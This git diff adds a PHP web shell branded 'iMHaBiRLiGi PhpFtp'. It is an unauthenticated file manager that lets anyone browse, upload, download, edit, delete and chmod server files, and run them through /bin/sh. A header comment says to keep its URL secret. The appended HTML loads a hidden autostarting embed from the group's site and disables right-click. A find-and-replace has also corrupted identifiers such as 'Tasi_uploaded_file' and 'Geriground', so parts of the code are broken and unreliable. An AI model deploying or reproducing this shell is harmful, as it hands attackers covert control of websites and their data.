+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte für "[%1]":',
+'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Répertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propriétaire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'Görevler' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Exécuter',
+
+'create_symlink' => 'Créer lien symbolique',
+'Sil' => 'Effacer',
+'Degistir' => 'Renommer',
+'Tasi' => 'Déplacer',
+'Kopyala' => 'Copier',
+'Düzenle' => 'Ouvrir',
+'indir' => 'Télécharger sur PC',
+'upload' => 'Télécharger sur serveur',
+'create' => 'Créer',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Exécuter',
+'reset' => 'Réinitialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'Geri' => 'Retour',
+'Yol' => 'Yol',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
+'already_exists' => '"[%1]" existe déjà.',
+'created' => '"[%1]" a été créé.',
+'not_created' => '"[%1]" n a pas pu être créé.',
+'really_Sil' => 'Effacer le fichier?',
+'Sild' => "Ces fichiers ont été détuits:\n[%1]",
+'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
+'Degistir_file' => 'Renomme fichier:',
+'Degistird' => '"[%1]" a été renommé en "[%2]".',
+'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
+'Tasi_files' => 'Déplacer ces fichiers:',
+'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
+'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
+'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
+'saved' => '"[%1]" a été sauvegardé.',
+'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
+'not_readable' => '"[%1]" ne peut pas être ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'Görevler' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'Sil' => 'cancella',
+'Degistir' => 'rinomina',
+'Tasi' => 'sposta',
+'Kopyala' => 'copia',
+'Düzenle' => 'modifica',
+'indir' => 'indir',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'Geri' => 'indietro',
+'Yol' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" è stato caricato.',
+'not_uploaded' => '"[%1]" non è stato caricato.',
+'already_exists' => '"[%1]" esiste già.',
+'created' => '"[%1]" è stato creato.',
+'not_created' => '"[%1]" non è stato creato.',
+'really_Sil' => 'Cancello questi file ?',
+'Sild' => "Questi file sono stati cancellati:\n[%1]",
+'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
+'Degistir_file' => 'File rinominato:',
+'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
+'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
+'Tasi_files' => 'Sposto questi file:',
+'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" non può essere modificato.',
+'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" è stato salvato.',
+'not_saved' => '"[%1]" non è stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non può essere letto.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'Säkerhetsnivå',
+'owner' => 'Ägare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'Görevler' => 'Funktioner',
+ 
+'read' => 'Läs',
+'write' => 'Skriv',
+'execute' => 'Utför',
+ 
+'create_symlink' => 'Skapa symlink',
+'Sil' => 'Radera',
+'Degistir' => 'Byt namn',
+'Tasi' => 'Flytta',
+'Kopyala' => 'Kopiera',
+'Düzenle' => 'Ändra',
+'indir' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => 'Ändra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'Töm',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'Geri' => 'Tillbaks',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Användare',
+'password' => 'Lösenord',
+'add' => 'Lägg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_Sil' => 'Radera dessa filer?',
+'Sild' => "De här filerna har raderats:\n[%1]",
+'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
+'Degistir_file' => 'Byt namn på fil:',
+'Degistird' => '"[%1]" har bytt namn till "[%2]".',
+'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
+'Tasi_files' => 'Flytta dessa filer:',
+'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" kan inte ändras.',
+'executed' => "\"[%1]\" har utförts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'Rättigheter för "[%1]":',
+'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte läsas.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Düzergah',
+'file' => 'Dosya',
+'filename' => 'DosyaAdi',
+
+'size' => 'Boyut',
+'permission' => 'izin',
+'owner' => 'Sahip',
+'group' => 'Grup',
+'other' => 'Diğerleri',
+'Görevler' => 'Görevler',
+
+'read' => 'Oku',
+'write' => 'Yaz',
+'execute' => 'Uygula',
+
+'create_symlink' => 'create symlink',
+'Sil' => 'Sil',
+'Degistir' => 'Degistir',
+'Tasi' => 'Tasi',
+'Kopyala' => 'Kopyala',
+'Düzenle' => 'Düzenle',
+'indir' => 'indir',
+'upload' => 'Yükle',
+'create' => 'Olustur',
+'change' => 'Degisiklik',
+'save' => 'Kaydet',
+'set' => 'Koyulan',
+'reset' => 'Yenile',
+'relative' => 'Hedefe Yolla',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'Geri' => 'Geri',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'Hiçbir çıktı',
+
+'user' => 'Kullanıcı',
+'password' => 'Sifre',
+'add' => 'Ekle',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" Yüklendi.',
+'not_uploaded' => '"[%1]" Yüklenemedi.',
+'already_exists' => '"[%1]" Şimdiden var ol.',
+'created' => '"[%1]" Olusturuldu.',
+'not_created' => '"[%1]" Olusturuldu.',
+'really_Sil' => 'Silinen dosyalar?',
+'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
+'not_Sild' => "Bu dosyalar olamazdı Sild:\n[%1]",
+'Degistir_file' => 'Dosyayi Degistir:',
+'Degistird' => '"[%1]" Degistirildi "[%2]".',
+'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
+'Tasi_files' => 'Dosyayi TAsi:',
+'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
+'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Bu Dosyalari Kopyala:',
+'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
+'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" Düzenle.',
+'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
+'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
+'saved' => '"[%1]" Kurtarildi.',
+'not_saved' => '"[%1]" Kurtarılamadı.',
+'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
+'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
+'permission_for' => 'izin "[%1]":',
+'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
+'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
+'not_readable' => '"[%1]" Okunamadi.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
+
+<title>iMHaBiRLiGi PhpFtp</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 0px; height: 0px }
+a, a:visited { text-decoration: none; color: red }
+hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; Geriground: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .Görevler { text-align: left }
+.listing_footer td { Geriground: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { Geriground: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; Geriground: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { Geriground: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { Geriground: maroon; color: white; border: 1px solid silver }
+#notice td { Geriground: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT 
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true 
+type="text/plain; charset=iso-8859-9" 
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if 
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers) 
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// --> 
+</script>
diff --git a/php/iMHaBiRLiGi Php FTP.php b/php/iMHaBiRLiGi Php FTP.php
new file mode 100644
index 0000000..2c003b7
--- /dev/null
+++ b/php/iMHaBiRLiGi Php FTP.php	
@@ -0,0 +1,2061 @@
+<?php
+/*
+ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
+ * Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
+ *
+ * Bu Kod Tamamiyle Özgür Yazilimdir.
+ * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
+ * Programin amaci ftp olmadan hostunuza baglanti kurup 
+ * Dosya ekleyip kaldira bilmektir.
+ * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
+ * -------------------------------------------------------------------------
+ * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
+ * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
+ * -------------------------------------------------------------------------
+ *
+ * iMHaBiRLiGi PhpFtp V1.1
+ * =========================================================================
+ *
+ * BeweiS
+ * <BeweiS@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * MicroP_
+ * <MicroP_@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * Libertical
+ * <libertical@imhabirligi.com>
+ *    iMHaBiRLiGi Yönetim
+ *    C++, Delphi,Programlama ve Linux Hastasi
+ *
+ * PowerGhost
+ * <powerghost@imhabirligi.com>
+ *    iMHaBiRLiGi Sistem Danismani
+ *    Sistem Danismani
+ *    
+ *  BadSector
+ *  ozgurkaleli@yahoo.com
+ *  iMHaBiRLiGi Yönetim
+ *   VicualBasic-Delphi Programlama
+ *   Sistemdanismani ve Linux Hastasi
+ *
+ * Bu kodun yaziliminda ismi gecen her arkadasimizin
+ * Katkilari bulunmustur.
+ * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
+ * Katkida bulunmuslardir.
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
+ * http://www.imhabirligi.com
+ *<iMHaBiRLiGi@imhabirligi.com>
+/* ------------------------------------------------------------------------- */
+
+/* Diller :
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'se' - Swedish
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of your filenames:
+ */
+$charset = 'ISO-8859-1';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the Düzenle textarea
+ */
+$Düzenlecols = 80;
+$Düzenlerows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (reTasi # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'indir':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'Sil':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Sild', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Sild', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_Sil') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Degistir':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (!@file_exists($dest) && @Degistir($file, $dest)) {
+			listing_page(notice('Degistird', $file, $dest));
+		} else {
+			listing_page(error('not_Degistird', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="Degistir" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('Degistir_file') . '</b>
+	<p>' . html($file) . '</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
+	<input type="submit" value="' . word('Degistir') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Tasi':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @Degistir($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
